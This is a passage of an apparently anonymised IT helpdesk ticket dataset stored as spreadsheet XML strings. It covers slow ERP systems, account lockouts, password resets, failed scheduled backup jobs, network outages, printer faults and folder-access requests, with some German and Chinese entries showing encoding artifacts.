               and self-service system password was forgotten, too.
               é‡ç½®å¯†ç ç½‘ç«™ çš„ç™»å½•å¯†ç ä¹Ÿå¿˜è®°äº†
               even worse, all systems were locked.
               å‡å·²ç»è¢«é”
               do me a fever to unlock them
               </t>
  </si>
  <si>
    <t>jmxqhrfa vawptbfl</t>
  </si>
  <si>
    <t>erp runs very slow in apac</t>
  </si>
  <si>
    <t>agents have to wait minutes for each operation of erp.</t>
  </si>
  <si>
    <t>zupifghd vdqxepun</t>
  </si>
  <si>
    <t>erp response time is very slow</t>
  </si>
  <si>
    <t xml:space="preserve">as we found that the erp response time (speed)  is very slow this morning,  please help chek and fix this issue aerp., </t>
  </si>
  <si>
    <t>tqfnalpj qyoscnge</t>
  </si>
  <si>
    <t>plant_298 erp SID_34 system slow</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: rxoynvgi.ntgdsehl@gmail.com_x000D_
_x000D_
hi it team_x000D_
_x000D_
kindly please assist to check, plant_298 encounter erp SID_34 system slow between 9am to 11:30am daily. </t>
  </si>
  <si>
    <t>pls. help to check erp due to slow response,thx!</t>
  </si>
  <si>
    <t xml:space="preserve">job bkwin_HostName_770_inc failed in job_scheduler at: 83.69.48.194 22:21:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bkwin_HostName_770_inc failed in job_scheduler at: 83.69.48.194 22:21:00</t>
  </si>
  <si>
    <t>HostName_957 &amp; 662 fence</t>
  </si>
  <si>
    <t>HostName_957 &amp; 662 fence are at 11 instead of 9</t>
  </si>
  <si>
    <t xml:space="preserve">a termination for hwddwwd wdflefrong, 11175wdnwe363, effective 09/16/2016 has been approved. </t>
  </si>
  <si>
    <t>homsxpyw qgcsaymo</t>
  </si>
  <si>
    <t xml:space="preserve">job bkwin_HostName_768_inc failed in job_scheduler at: 83.69.48.194 21:39:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bkwin_HostName_768_inc failed in job_scheduler at: 83.69.48.194 21:39:00</t>
  </si>
  <si>
    <t>terminate action for svfuhlnx aqrzskpg has completed</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
a termination for svfuhlnx aqrzskpg, 11177614, effective 09/01/2016 has been approved. _x000D_
</t>
  </si>
  <si>
    <t>old emails</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: pojhkxua.frpxtsca@gmail.com_x000D_
_x000D_
how do i access my earlier work emails?_x000D_
dell desktop doesn't pull up mails older than april 2015 !_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_39hotf failed in job_scheduler at: 83.69.48.194 20:50:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_39hotf failed in job_scheduler at: 83.69.48.194 20:50:00</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_37hotf failed in job_scheduler at: 83.69.48.194 20:47:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_37hotf failed in job_scheduler at: 83.69.48.194 20:47:00</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_38hotf failed in job_scheduler at: 83.69.48.194 20:48:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_38hotf failed in job_scheduler at: 83.69.48.194 20:48:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_564 failed in job_scheduler at: 83.69.48.194 20:01:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
backup statistics:_x000D_
          _x000D_
  session queuing time (hours)         0.00        _x000D_
  -------------------------------------------      _x000D_
  completed disk agents ........          2          _x000D_
  failed disk agents ...........          0          _x000D_
  aborted disk agents ..........          0          _x000D_
  -------------------------------------------      _x000D_
  disk agents total  ...........          2          _x000D_
  ===========================================      _x000D_
  completed media agents .......          1          _x000D_
  failed media agents ..........          3          _x000D_
  aborted media agents .........          0          _x000D_
  -------------------------------------------      _x000D_
  media agents total  ..........          4          _x000D_
  ===========================================      _x000D_
  mbytes total .................     601 mb        _x000D_
  used media total .............          1          _x000D_
  disk agent errors total ......          0 _x000D_
_x000D_
job Job_564 failed in job_scheduler at: 83.69.48.194 20:01:00</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_79hot failed in job_scheduler at: 83.69.48.194 19:57:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
[major] from: bma@HostName_1302.hq.company.com "lib6_drive10"  time: 83.69.48.194 7:56:31 pm_x000D_
[90:51]   /dev/rmt46.1_x000D_
 cannot write to device ([5] i/o error)_x000D_
_x000D_
job SID_79hot failed in job_scheduler at: 83.69.48.194 19:57:00</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_79hot failed in job_scheduler at: 83.69.48.194 19:19:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_79hot failed in job_scheduler at: 83.69.48.194 19:19:00</t>
  </si>
  <si>
    <t>windows password reset request</t>
  </si>
  <si>
    <t>uyjcxkql amcvnfbs</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_555 failed in job_scheduler at: 83.69.48.194 19:11:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_555 failed in job_scheduler at: 83.69.48.194 19:11:00</t>
  </si>
  <si>
    <t>unable to log in to ethics</t>
  </si>
  <si>
    <t>fsvnjexu yxaevupi</t>
  </si>
  <si>
    <t>query to send a skype meeting</t>
  </si>
  <si>
    <t>unable to connect to home printer</t>
  </si>
  <si>
    <t>wstxjbpv tjlncygd</t>
  </si>
  <si>
    <t>folder access required</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: naruedlk.mpvhakdq@gmail.com
dear it team,
please usa read and write access on the following two folders to me (dnqdqld).
\\HostName_645\departments\personal&lt;file:///\\HostName_645\departments\personal&gt;
\\HostName_753\departments\pesonal&lt;file:///\\HostName_753\departments\pesonal&gt;
</t>
  </si>
  <si>
    <t>naruedlk mpvhakdq</t>
  </si>
  <si>
    <t>ticket update inplant_871302</t>
  </si>
  <si>
    <t>outlook issue :ms crm dynamics</t>
  </si>
  <si>
    <t>please usa sasqkjqh lwddkqddq access to printer cl74_ps per lpoebzsc grknswyo</t>
  </si>
  <si>
    <t xml:space="preserve">password update query </t>
  </si>
  <si>
    <t>vpn query for user vvtdfettc67</t>
  </si>
  <si>
    <t>collaboration_platform - industrial</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: okmhzgcq.wzvetbqa@gmail.com_x000D_
_x000D_
good afternoon â€“_x000D_
can you please add a new library heading  ( talent review) to the library area.   can you also remove kristina cope as the owner of this portion of this page.  please use myself, mtdyuhki fdnrxaci and ifblxjmc dyrgfwbm to this page._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
[cid:image001.png@01d22ae8.0c3cb4d0]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>okmhzgcq wzvetbqa</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_37hotf failed in job_scheduler at: 83.69.48.194 15:02:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_37hotf failed in job_scheduler at: 83.69.48.194 15:02:00</t>
  </si>
  <si>
    <t>erp station in castings is not working.</t>
  </si>
  <si>
    <t>dalmdwppi56 pc in castings is not working.</t>
  </si>
  <si>
    <t>no boot</t>
  </si>
  <si>
    <t>jinyluhq wpvelhtz</t>
  </si>
  <si>
    <t xml:space="preserve">my outlook doesnÂ´t work. </t>
  </si>
  <si>
    <t xml:space="preserve">in last fourth weeks i have same problem. i start outlook. outlook is opening but it doesnÂ´t open. it was 3 times fixed by our it service technician but it help always for one week and than  it appeares again. please help me to fix it. 
my phone number is . i will be at home tomorrow afternoon  from 15:30. 
</t>
  </si>
  <si>
    <t>dismypxe zkwcmgsr</t>
  </si>
  <si>
    <t xml:space="preserve">erp SID_34 : account lock out </t>
  </si>
  <si>
    <t>pizcefdg wkyxbgda</t>
  </si>
  <si>
    <t xml:space="preserve">not able to get a delivery to create for 5019322902, mm# 7275831 </t>
  </si>
  <si>
    <t xml:space="preserve">i believe apo is out of synch and cif programdnty may need to be run.  the sto was created 10/07/2016.  inventory received at 1:18 this afternoon.  next bop job is not scheduled until after 6 pm. this sto needs to ship before then. </t>
  </si>
  <si>
    <t>GRP_45</t>
  </si>
  <si>
    <t>ticket update on inplant_871350</t>
  </si>
  <si>
    <t xml:space="preserve">quoting engine:  error </t>
  </si>
  <si>
    <t>lagqkmto xqtldrcs</t>
  </si>
  <si>
    <t>413475046745
reset outlook password for theecanse wdleell (his windows logon password is different since he doesn't log on to 
company)</t>
  </si>
  <si>
    <t>guest internet access.</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: etnroabk.jkvshlfm@gmail.com
i am having trouble with getting internet guest access for the person below.
skads wdlmdwwck
technician engineering - usa plant
etnroabk.jkvshlfm@gmail.com&lt;mailto:etnroabk.jkvshlfm@gmail.com&gt;
</t>
  </si>
  <si>
    <t>etnroabk jkvshlfm</t>
  </si>
  <si>
    <t>files on servers not available.  files cannot be opened.HostName_1326</t>
  </si>
  <si>
    <t>details provided when trying to open a file only states "the file is corrupt and cannot be opened."  multiple files noticed since wednesday, october 19, 2016, at plant_3 have become unavailable.  confirmation of unavailable files from different departments.  no e-mail of notice regarding any possible server changes.</t>
  </si>
  <si>
    <t>pkfvoucw yhmicuba</t>
  </si>
  <si>
    <t>modem in the idg area is down at the usa plant</t>
  </si>
  <si>
    <t xml:space="preserve"> contact # : 
summary:modem in the idg area is down at the usa plant</t>
  </si>
  <si>
    <t>zlpkfdox gzlciskf</t>
  </si>
  <si>
    <t>interface 'serial0/0/0 and serial0/1/1:0 Â· connection to usa plant is  down since 12:45 pm et on 10/20.</t>
  </si>
  <si>
    <t xml:space="preserve">ad account locked out </t>
  </si>
  <si>
    <t>nacrbmxo ptbjlxar</t>
  </si>
  <si>
    <t>multiple location across europe went down at 11:50am et on 10/20, please find the attached.</t>
  </si>
  <si>
    <t>what type of outage:  ___x__network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____yes_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ___11:50am et on 10/20___________________x000D_
_x000D_
3.  scheduled maintenance ( power) ? __no_____    (yes/no/na)     company power  _________     provider power __________x000D_
                _x000D_
4.  scheduled maintenance ( network) ? ___yes____    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000D_
_x000D_
5. does site have a backup circuit ?  ___yes___    (yes/no/na) _x000D_
_x000D_
6. backup circuit active ?   ___no_____     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  ___yes______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</si>
  <si>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uvrbhlnt bjrmalzi</t>
  </si>
  <si>
    <t xml:space="preserve">citrix access. </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: lenxvcbq.vwnhjtoi@gmail.com
i am getting a certificate error trying to access hfyujqti jdcbiezxs. see attached.
hddwdw lwdwdwdr
lenxvcbq.vwnhjtoi@gmail.com&lt;
</t>
  </si>
  <si>
    <t>lenxvcbq vwnhjtoi</t>
  </si>
  <si>
    <t xml:space="preserve">erp SID_34 password reset request </t>
  </si>
  <si>
    <t>ikerxqwz prkyuitl</t>
  </si>
  <si>
    <t>symantec pop query : ran quick scan and deleted cookies.</t>
  </si>
  <si>
    <t>jhwgydeb ufiatosg</t>
  </si>
  <si>
    <t>access to http:://bddjwwwdw/ for axcbfuqo yiagubvh</t>
  </si>
  <si>
    <t xml:space="preserve">axcbfuqo yiagubvh no longer has access to http:://bddjwwwdw/. he needs access.
please see the attached email from gilles.
good morning,
there is a very long time that i did not contacted the team and youâ€¦..
i am in india for 2 weeks and work with the team using the new equipment.
i need your help because i am not anymore able to be connected to: 
 application where i was able to make a consultation.
i received this following message.
can you help to have this connection working again?
i have also the competitive databse but this is still working well.
</t>
  </si>
  <si>
    <t>axcbfuqo yiagubvh</t>
  </si>
  <si>
    <t xml:space="preserve">unable to connect to outlook </t>
  </si>
  <si>
    <t>wjslkzfr jxlbzwrp</t>
  </si>
  <si>
    <t>error with customization (engineering tool) - erp plam and company tools</t>
  </si>
  <si>
    <t xml:space="preserve">hi team, 
i need your help with two error the customization the (engineering tool). the two errors attachment in ticket.
erro computer: lpawty8515404 - diwhdd jwddkwor and lpawty8515494 - gsotqxfi lidunfjg
if you have more doubts please contatc me.
</t>
  </si>
  <si>
    <t>GRP_46</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3051 failed in job_scheduler at: 83.69.48.194 12:38:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3051 failed in job_scheduler at: 83.69.48.194 12:38:00</t>
  </si>
  <si>
    <t xml:space="preserve">mobile device activation : company owned </t>
  </si>
  <si>
    <t xml:space="preserve">
summary:need phone to connect to outlook</t>
  </si>
  <si>
    <t>iehdjwvt rndtlyhv</t>
  </si>
  <si>
    <t>outlook outage</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: dxwuovgs.lmuxizht@gmail.com
hello,
is outlook down? i can't seem to connect on laptop remotely.
please advise.
sent from my iphone
dxwuovgs lmuxizht
sr. sales engineer
dxwuovgs.lmuxizht@gmail.com&lt;mailto:dxwuovgs.lmuxizht@gmail.com&gt;
</t>
  </si>
  <si>
    <t>dxwuovgs lmuxizht</t>
  </si>
  <si>
    <t>urgent - please create tax code a0 in cc54yks09.</t>
  </si>
  <si>
    <t xml:space="preserve">please create tax code a0 in cc54yks09.this is really urgent, as we have to post vat inwarehouse_tool by the end of the week.
background:
there was an export of goods from this location to germany (from plant_212 to plant_105).
delivery 9041183500, sto  -  5019291372, vat inwarehouse_tool 0461363360 â€“ is not posted in finance.
</t>
  </si>
  <si>
    <t>kxcawjet xmybdwfh</t>
  </si>
  <si>
    <t>crm access issue</t>
  </si>
  <si>
    <t>hi, poland cannot log into crm. all users in poland</t>
  </si>
  <si>
    <t>utrvshcp bjlwcovt</t>
  </si>
  <si>
    <t xml:space="preserve">job pp_EU_tool_netch_ap1 failed in job_scheduler at: 83.69.48.194 11:54:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job pp_EU_tool_netch_ap1 failed in job_scheduler at: 83.69.48.194 11:54:00</t>
  </si>
  <si>
    <t>email license</t>
  </si>
  <si>
    <t>i need to check on email license for production leads.
28246727 dwwkd wdjwd usa wdnwk
28228474 wdwmd wdkfww usa whwdiuw
27144424 wdnwwl kwfwdw usa wdkwdwd</t>
  </si>
  <si>
    <t xml:space="preserve">can not sign into crm or single sign on portal on the hub. </t>
  </si>
  <si>
    <t>can not sign into crm or single sign on portal on the hub. it states my password is not correct. this is the password i use for all other access points in company.</t>
  </si>
  <si>
    <t>calibration system printer</t>
  </si>
  <si>
    <t>printer dymo labelwriter 450 turbo is not working, can't print calibration label for our gages.</t>
  </si>
  <si>
    <t>vushymxe ifrbzdtl</t>
  </si>
  <si>
    <t>unable to change password</t>
  </si>
  <si>
    <t>sdgqujpr dtilnycz</t>
  </si>
  <si>
    <t xml:space="preserve">not able to login to sso : one team : it never worked </t>
  </si>
  <si>
    <t>not able to login to sso : one team : it never worked _x000D_
refer ticket : ticket_no0446943</t>
  </si>
  <si>
    <t>fbwqocvh olapczwf</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_37hotf failed in job_scheduler at: 83.69.48.194 10:54:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_37hotf failed in job_scheduler at: 83.69.48.194 10:54:00</t>
  </si>
  <si>
    <t>pc rqxw8515267 setup for remote company use cannot be logged in to, it appears the domain membership is broken.</t>
  </si>
  <si>
    <t xml:space="preserve">bdwdwarbara needs the permissions to save to the folder (srvlavstorage01)( j):toolroom/tooling documentation </t>
  </si>
  <si>
    <t>tfesaxip cvorpnth</t>
  </si>
  <si>
    <t>needs access to server \\HostName_852\drafting\itar  to the user-wdwddw wwdyuan(yqddquanw), read only access</t>
  </si>
  <si>
    <t>the name of the employee who needs access is wdwddw wwdyuan(yqddquanw), employee number 2807162637
the file is located on our operations drive (v drive)then sub file drafting, then sub file itar. this was set up by our own it guy before he was laid off</t>
  </si>
  <si>
    <t>bkscnoqz umaojbci</t>
  </si>
  <si>
    <t>need access to ess</t>
  </si>
  <si>
    <t>engineering_tool installation</t>
  </si>
  <si>
    <t>mcphgvnb bdegqtyj</t>
  </si>
  <si>
    <t>EU_tool for plant plant_197 is working very slowly. please help here immediately. thanks</t>
  </si>
  <si>
    <t xml:space="preserve">EU_tool for plant plant_197 is working very slowly. please help here immediately. </t>
  </si>
  <si>
    <t xml:space="preserve">crm issue : ms ouutlook issue </t>
  </si>
  <si>
    <t xml:space="preserve">crm issue : ms outlook issue </t>
  </si>
  <si>
    <t>jartombc ghnxkmsl</t>
  </si>
  <si>
    <t>user needs help to login to the mii.</t>
  </si>
  <si>
    <t xml:space="preserve">user needs help to login to the mii._x000D_
</t>
  </si>
  <si>
    <t>jnlzsubr cfgustlo</t>
  </si>
  <si>
    <t xml:space="preserve">EU_tool, pdv, batch management does not work </t>
  </si>
  <si>
    <t>working with the systems is almost impossible. the processing of orders is no longer possible at the moment _x000D_
das arbeiten mit den systemen ist fast nicht mÃ¶glich. das abarbeiten von auftrÃ¤gen ist zur zeit nicht mehr mÃ¶glich</t>
  </si>
  <si>
    <t>hwxqoijt cotsgwrj</t>
  </si>
  <si>
    <t>xvwchsdg pladjmxt - employee termination pn</t>
  </si>
  <si>
    <t xml:space="preserve">gehe einmal davon aus das herr aurwddwacher zum ende oktober das unternehmen verlÃ¤sst bzw. in ruhestand/rente geht.
im prozess der lÃ¶schung des accounts (ticketing_tool â€“ vorlage employee status termination) kann unter â€žspecial instuctrion" eine sogenannte delegation angegeben werden.
somit erhÃ¤lt derjenige dem die postfach delegiert wurde zugriff fÃ¼r einen bestimmten zeitraum.
die vorlage wird normalerweise vom vorgesetzten / bzw. zustÃ¤ndigen hr-abteilung ausgefÃ¼llt und sollte mit beiden abgesprochen werden.
</t>
  </si>
  <si>
    <t>upiyobvj lwohuizr</t>
  </si>
  <si>
    <t xml:space="preserve">please reset my SID_34 password  </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: azxhejvq.fyemlavd@gmail.com
userid waldjrrm667
</t>
  </si>
  <si>
    <t>user needs help to login to the collaboration_platform site.</t>
  </si>
  <si>
    <t>user needs help to login to the collaboration_platform site._x000D_
-provided the user the email id and password after verifying the user details._x000D_
-advised the user to try and login to the collaboration_platform._x000D_
-user confirmed he is now able to login to the collaboration_platform._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t>ajzycbnu ntfvpsqu</t>
  </si>
  <si>
    <t>account lockout</t>
  </si>
  <si>
    <t>wqfpkcgh vxtqeris</t>
  </si>
  <si>
    <t>outlook table view incorrect</t>
  </si>
  <si>
    <t>ylqvitsk bfnackrw</t>
  </si>
  <si>
    <t>computer problem</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: uskydftv.sgwbfkjz@gmail.com_x000D_
_x000D_
dear, i was not able to go on internet since this morning. an itbof germany was not able to log in. we have tried so much that the pasword is locked. i have the message: your password has expired and must be changed. please forward me the new password. </t>
  </si>
  <si>
    <t>uskydftv sgwbfkjz</t>
  </si>
  <si>
    <t>design pane not showing up in "analysis for ms excel"</t>
  </si>
  <si>
    <t xml:space="preserve">hello,_x000D_
_x000D_
when i use analysis for ms excel now, i can't see the design pane even when option is turned on (refer to screenshot). i was able to see design pane earlier without problem. the only major change on my pc is recently i upgraded to office 2016 suite. can you please help bring my design pane back? </t>
  </si>
  <si>
    <t>entuakhp xrnhtdmk</t>
  </si>
  <si>
    <t>browser issue : flash player and addins issue</t>
  </si>
  <si>
    <t>csmhykge mpxbjudw</t>
  </si>
  <si>
    <t>not able to do pgi del. 9169653789- customer vale - co account assignments have different profit centers</t>
  </si>
  <si>
    <t xml:space="preserve">not able to do pgi for delivery 9169653789- customer 81936871 - vale  -td order 35038980 . _x000D_
itens 3546297-3 pieces /3546296-3 pieces/7150128-4 pieces/7150129-4 pieces . _x000D_
urgente uacyltoe hxgaycze for customer _x000D_
_x000D_
error - _x000D_
co account assignments have different profit centers_x000D_
message no. bk134_x000D_
_x000D_
diagnosis_x000D_
you entered multiple co account assignments objects assigned to different profit centers. in a document item, however, all co account assignments objects with profit center assignments must be assigned to the same profit center._x000D_
_x000D_
procedure_x000D_
if the message is an error message, check and change the co account assignments objects so that all objects with profit center assignments are assigned to the same profit center._x000D_
_x000D_
in customizing, you can change this message from an error message to a warning message, a notification, or you can deactivate it completely. to do so, see the implementation guide (img) step under "controlling: general -&gt; change message control" (message class bk, message 134)._x000D_
</t>
  </si>
  <si>
    <t>jaeuqbvt orlhenfj</t>
  </si>
  <si>
    <t>bex analyzer report not working</t>
  </si>
  <si>
    <t xml:space="preserve">i open bex analyzer and connect to SID_37_x000D_
i try to open report [xhlg_pmm_atm] product management - master at m_x000D_
the window to "select values for variables" appears, no available variants, data provider 1 is set to 1 for finance._x000D_
i click ok, the system sits and does nothing.  eventually i get a "microsoft excel not responding" error._x000D_
_x000D_
is there something wrong with the system?  is there something wrong with my settings?_x000D_
_x000D_
i need to pull reports for an external auditor so it is rather urgent that i get this fixed quickly._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>wgothrzl iokdftgn</t>
  </si>
  <si>
    <t>cannot print on usa printer prtqx4580 any longer.  please fix.</t>
  </si>
  <si>
    <t>xzcwlqrv fjrdhiqt</t>
  </si>
  <si>
    <t>unable to print from the printer qc0567</t>
  </si>
  <si>
    <t>i need to have k-rckf grind added to my microsoft email.</t>
  </si>
  <si>
    <t>no one has helped me with this. i am not sure why this was closed out when i had received no help?</t>
  </si>
  <si>
    <t>raifstow gfeymtql</t>
  </si>
  <si>
    <t>user unable to connect at the companysecure  at office.</t>
  </si>
  <si>
    <t xml:space="preserve">user unable to connect at the companysecure  at office.
-checked the network connection settings.
-enabled the network connections.
-updated the network drivers .
-updated the bios  on the pc.
-restarted the pc.
-user iformed he is ina  meeting and will call tomorrow.
</t>
  </si>
  <si>
    <t xml:space="preserve">barcode Ã¼ber word etikettendruck </t>
  </si>
  <si>
    <t xml:space="preserve">ich will im etikettendruck eine zahlen buchstaben drucken als barcode Ã¼ber word etikettendruck 
mit der schriftart coSID_4428 geht dies nicht das ich es mit einer scanpistole lesen kann
phone: </t>
  </si>
  <si>
    <t xml:space="preserve">job SID_37hotf failed in job_scheduler at: 83.69.48.194 07:43:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_37hotf failed in job_scheduler at: 83.69.48.194 07:43:00</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: naruedlk.mpvhakdq@gmail.com
dear it team,
please usa read and write access on the following two folders to me (webr3gers45).
\\HostName_645\departments\personal&lt;file:///\\HostName_645\departments\personal&gt;
\\HostName_753\departments\pesonal&lt;file:///\\HostName_753\departments\pesonal&gt;
</t>
  </si>
  <si>
    <t>nmujidyk suylrqbi</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1309 failed in job_scheduler at: 83.69.48.194 07:16:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1309 failed in job_scheduler at: 83.69.48.194 07:16:00</t>
  </si>
  <si>
    <t>bitte user gogtyektdgwo richtig einstellen .nach anmeldung fehlen alle netzlaufwerke</t>
  </si>
  <si>
    <t>called in to get in touch with ecwtrjnq jpecxuty</t>
  </si>
  <si>
    <t>gzjtweph mnslwfqv</t>
  </si>
  <si>
    <t>vip1: account unlock</t>
  </si>
  <si>
    <t>support fÃ¼r roboworker \sandstrahlen \xwirzvda okhyipgr</t>
  </si>
  <si>
    <t>xwirzvda okhyipgr</t>
  </si>
  <si>
    <t>setup new ws \lndypaqg dhqwtcsr</t>
  </si>
  <si>
    <t>ticket update for-ticket_no0447000</t>
  </si>
  <si>
    <t>circuit outage:india -admin-4503-core-sw01 is down.at 6:27 am et on 10/20.</t>
  </si>
  <si>
    <t>circuit outage: company-ap-ind-telecom_vendor_1-dmvpn-2921-rtr01 is down since 83.69.48.194 6:26 am et. site is up telecom_vendor_3.</t>
  </si>
  <si>
    <t>what type of outage:  _____network     ___x__circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____yes_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   _____ 83.69.48.194 6:26 am et_________________x000D_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__yes______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</si>
  <si>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iwqfelcu gsubfiml</t>
  </si>
  <si>
    <t>telefon im "meeting room 3" telefonnummer 263 in germany funktioniert der klingelton nicht.</t>
  </si>
  <si>
    <t>wenn jemand von auÃŸerhalb anruft dann klingelt das telefon nicht. bitte mal nachschauen, danke.</t>
  </si>
  <si>
    <t>fhzeoyws gudfnirz</t>
  </si>
  <si>
    <t>unable to launch outlook</t>
  </si>
  <si>
    <t>iuoavmpx suojykvf</t>
  </si>
  <si>
    <t>system (SID_34, SID_37, SID_39, SID_38, hrp, other ?): pm!_x000D_
_x000D_
enter user id of user having the issue: mathes_x000D_
_x000D_
transaction code(s) the user needs or was working with:_x000D_
_x000D_
describe the issue: please reset the password. if required, please unlock the id._x000D_
_x000D_
if you are getting a "not authorized" message, recreate the condition then do   /nsu53   and attach result to the ticketing_tool ticket._x000D_
_x000D_
provide access the same as this other user:</t>
  </si>
  <si>
    <t>waekugzo dwzfghqo</t>
  </si>
  <si>
    <t>erp account locked</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: uexodhqa.txqoifsl@gmail.com_x000D_
_x000D_
dear team,_x000D_
_x000D_
my erp account got locked because of wrong password attempt._x000D_
_x000D_
please support to get unlock the same._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>uexodhqa txqoifsl</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_593 failed in job_scheduler at: 83.69.48.194 05:42:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_593 failed in job_scheduler at: 83.69.48.194 05:42:00</t>
  </si>
  <si>
    <t>erp printing - !production order! printer mp7456 replacement</t>
  </si>
  <si>
    <t xml:space="preserve">production order printer mp7456 is being replaced.
- remove rerouting from mp7456 to mp82 on erp systems
-------------------------------------------------------------------------------------------------------------------------
printer replacement
*you will need to have power / network connectivity and the printer installed - ready before a ticketing_tool ticket can be opened. do you have all 3 requirements above satisfied? (yes / no)? yes
*replacing erp printer name (e.g. hq01, id02, wy61)? mp7456 ( name stays the same)
*ip address s if known? 10.16.77.214 (ip stays the same)
*make/model of the replacement erp printer? hp laserjet 500 m575f
*what erp printer do you currently use (e.g. hq01, id02, wy61)? -
*list the erp system the printer needs to be defined? erp (SID_1,SID_21,SID_34, SID_37, SID_39, SID_38, hrp, plm etcâ€¦)? hrp,SID_34, plm (same as old mp7456)
*what is currently printed on these printers from erp (e.g. inwarehouse_tools, delivery notes etc..)? same as old mp7456
*location of install: country / city / building / floor / cubicle? same as old mp7456
*local it site contact name? xvwchsdg pladjmxt
optional: printer serial number / printer mac address? serial: cnctf6418t
</t>
  </si>
  <si>
    <t>xvwchsdg pladjmxt</t>
  </si>
  <si>
    <t>hedjdbwlmut.nwwiebler called regarding a folder access query</t>
  </si>
  <si>
    <t>folder read and write access needed</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: unzfipac.opwzmlbc@gmail.com_x000D_
_x000D_
dear colleagues,_x000D_
_x000D_
please usa access to this path for me for read and write access:_x000D_
_x000D_
t:\corpbusinessdev\monthly financial review_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>unzfipac opwzmlbc</t>
  </si>
  <si>
    <t>activation of outlook email access on iphone 7 device for awddmwdol mwddwansuke</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: kbclinop.vsczklfp@gmail.com
hi,
please usa email access on new iphone 7 device for our indirect channel manager, information as follow :
email: ecxwnmqi.pztiqjuh@gmail.com&lt;mailto:ecxwnmqi.pztiqjuh@gmail.com&gt;
manager's name : sqqqd zlkmlwdwdade &amp; nidqknwjktin dewkiodshpande
is this device company owned?  yes
is this a replacement of your old device?  yes, as the existing old samsung phone is faulty.
</t>
  </si>
  <si>
    <t>access issue to ess</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: ihkolepb.ozhnjyef@gmail.com
hello,
one of the temperory workmen-nxcfastp xnwtyebg  whose user id is vvandwkjis   is not able to login to ess as his user id locked.  he is a kiosk user.  please  re-set his password and confirm.
</t>
  </si>
  <si>
    <t>probleme mit barcode etiketten \volume format zu groÃŸ \vzqomdgt jwoqbuml</t>
  </si>
  <si>
    <t>obleme mit barcode etiketten \volume format zu groÃŸ \vzqomdgt jwoqbuml</t>
  </si>
  <si>
    <t>setup new ws in br \usalikfj lfmpxbcn</t>
  </si>
  <si>
    <t>usalikfj lfmpxbcn</t>
  </si>
  <si>
    <t>der monitor an unser lÃ¤ngenmessmaschine ist defekt .</t>
  </si>
  <si>
    <t xml:space="preserve">guten morgen hkydrfdw,
der monitor an unser lÃ¤ngenmessmaschine ist defekt.
bitte kurzfristig einen ersatzmonitor bereitstellen.
danke
</t>
  </si>
  <si>
    <t>ctbsupdy auhocbli</t>
  </si>
  <si>
    <t>fregabe fÃ¼r ordner applications wurde gekappt???</t>
  </si>
  <si>
    <t>bitte wieder freigeben</t>
  </si>
  <si>
    <t>lzpuyrvw zkxbacvn</t>
  </si>
  <si>
